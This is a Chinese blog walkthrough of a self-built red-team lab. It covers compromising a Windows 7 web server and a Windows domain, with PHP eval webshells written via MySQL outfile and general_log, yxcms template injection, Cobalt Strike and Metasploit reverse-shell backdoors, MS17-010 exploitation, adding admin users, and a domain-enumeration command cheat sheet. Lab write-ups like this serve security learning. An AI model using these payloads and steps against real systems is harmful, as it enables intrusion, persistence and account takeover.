type
status
date
slug
summary
tags
category
icon
password
环境搭建
攻击机:kali——192.168.187.128 [NET模式]
web服务器:win7——双卡(192.168.187.33 [NET模式]/192.168.52.129 [仅主机])
内网机子:win2k3(192.168.52.141 [仅主机])win2k8(192.168.52.138 [仅主机])
网络拓扑图:
Ps:关闭win7、和win2k8防火墙
win2k3/win2k8密码:hongrisec@2019(输入后修改为Hongrisec@2019)
WEB渗透
打开win7的web服务
根据路径:C:\phpStudy\phpStudy.exe 打开web服务
信息收集
用nmap扫描win7
得知win7已成功开启mysql服务和开了80端口和3306端口
浏览器访问192.168.187.33,是phpStudy探针页面
用dirsearch扫描win7
拿到phpMyAdmin,发现是一个登录的页面
简单尝试后,成功登进(账号密码都是弱口令:root)
Mysql数据库写shell
- 通过报错获取网站的绝对路径:select @@basedir
- 查看是否有文件写入权限:show global variables like ‘%secure%’
发现是NULL,这样就不能用into outfile写入文件了,但还是记录一下,如果可以的话怎么写:
select ‘<?php eval($_POST[123]);?>’ into outfile ‘C:/phpStudy/www/shell.php’
- 尝试日志写入shell
- 查看日志状态 show variables like ‘%general%’
- 修改general_log值为ON:set global general_log=”ON”
- 执行一句话木马,会自动写入设置的日志文件:select’<?php @eval($_POST[123]);?>’
- 用kali的蚁剑连接成功
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。
修改general_log_file值:set global general_log_file=”C:/phpStudy/WWW/webshell.php”
WEB后台传shell
- 扫目录的时候扫到了beifen.rar,以及搭建了yxcms(《别人dirsearch》自己的字典拉了没扫到)
- 经过一番摸索,在左栏前台模板那里找到突破口,那里有网页的源码,还可以编辑。
直接在源码加入一句话木马,保存后连接蚁剑
↑↑↑这是第二种打穿win7的方法↑↑↑
- 第三种方法也是用它搭建的yxcms,和第二种的区别是传入一个一句话木马文件。
信息收集2.0
- 使用ipconfig /all 判断是否存在域。
看到存在god.org域
- 可以执行命令net config Workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息
- 查看域信息:net view(在蚁剑的里执行命令没有反应,其他人的wp是用的cs和msf提权后执行,到这里下面的命令就不在蚁剑执行了,只是记录一下,等用cs和msf提权后再执行)
- 查看主域信息:net view /domain,有一个GOD的域。
- 查询当前的登录域与用户信息:net config workstation
- 获取域内用户的详细信息:wmic useraccount get /all
- 查看是否存在杀毒进程:tasklist
CS🐎植入后门木马
- 用kali和win10的cs客户端和服务端,生成后门病毒HRshell.exe并成功通过蚁剑上传到win7
- 通过蚁剑命令执行木马 start HRshell.exe
- win10 CS客户端成功反弹shell
提权
- 接着继续执行上面信息收集2.0未执行的部分
查看域信息 net view
获取域内详细信息:wmic useraccount get /all
CS内网横向渗透(Loser)
#理论上是可以用CS的SMB来横向渗透的,但是不知道为什么尝试多遍都不成功,小队里的其他成员实操上都没有问题,一起讨论最终还是没能解决
#下面的只是记录实操的一部分(失败品)
#含蓄的说是玄学,说白了是cai了,不懂它的原理是什么,也就没能解决,以后能力提升了再回过头来看,附下几篇文章:
- 主机上线后,新建一个SMB Beacon,输入监听器名称,选择Beacon SMB,管道名称可以直
接默认,也可以自定义。
- 接下来在Beacon中直接输入
spawn SMB,这里的SMB指代的是创建的SMB Beacon的监听器名称,也可以直接右击session,在Spawn选项中选择刚添加的SMB Beacon。
- 等待一会儿,就可以看到派生的SMB Beacon,在external中可以看到IP后有个
∞∞字符。
接下来我这里将SMB Beacon插入到进程中,以vmtoolsed进程为例。
MSF🐎植入后门木马
这是另一种打进win7的方法,和CS大同小异。
- 生成MSF🐎:
(上面的payload跟别人的不太一样但效果是一样的,在msf里show payloads后发现没有别人那个
payload)
- 将生成的msf🐎用蚁剑传入win7后命令执行,成功反弹shell
当然,生成🐎后要记得设置好msf监听
在设置好以上的msf监听后再用蚁剑执行就能反弹shell了
MSF🐎内网横向渗透
信息收集3.0
获得系统信息:sysinfo
进入shell:shell 发现乱码:chcp 65001
查看域内其他机子:net view
定位域控:net group “domain controllers” /domain
定位域管:net group “domain admins” /domain
扫描内网存活主机
先退出shell(exit),然后把session放到后台(background),sessions命令可以查看会话id
接着知道这个id后直接扫描内网其他主机
但是不知道哪些主机是存活的,可以用udp协议发现内网存活主机
从扫描结果分析出,存活主机还有138和141
挂代理
back后直接进入sessions 1
- 新建路由
- 查看路由
jobs查看
修改proxychains4.conf
扫描内网主机端口
另外两个内网主机分别用两种方法扫描端口
方法一:
方法二:
另一种方法是利用了msf的端口扫描模块
可见,主机138和141都开了135、139、445端口
利用ms17-010攻击
得知主机138和141都开启了445端口,直接永恒之蓝漏洞攻击
- 先用模块3来扫描两个主机是否存在永恒之蓝漏洞
接下来就用上面三个模块依次尝试攻击
模块0
主机138:成功执行但反弹shell失败
主机141:此模块仅支持x64,反弹shell失败
模块1
主机138:超时,反弹shell失败
主机141:反弹shell失败
模块2
- 主机138:成功反弹shell
- 主机141:成功反弹shell
其他
添加user
- 在永恒之蓝模块2成功后,可以进行添加user操作
- 查看user
- 加入管理员组
- 查看管理员
模块1 psexec
有的文章说由于域控主机是不出网的,要攻击机去主动连接域控服务器才行,把payload改为
就能成功,但是我试了不行,把x64去掉也不行
常用信息收集
ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
whoami
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
net group "doamin controllers" /domain 查看域控制器(可能有多台)
- 作者:Lcbery
- 链接:https://lcbery.top/article/2c4c6f42-9754-4932-9b73-e8ecff8ce659
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。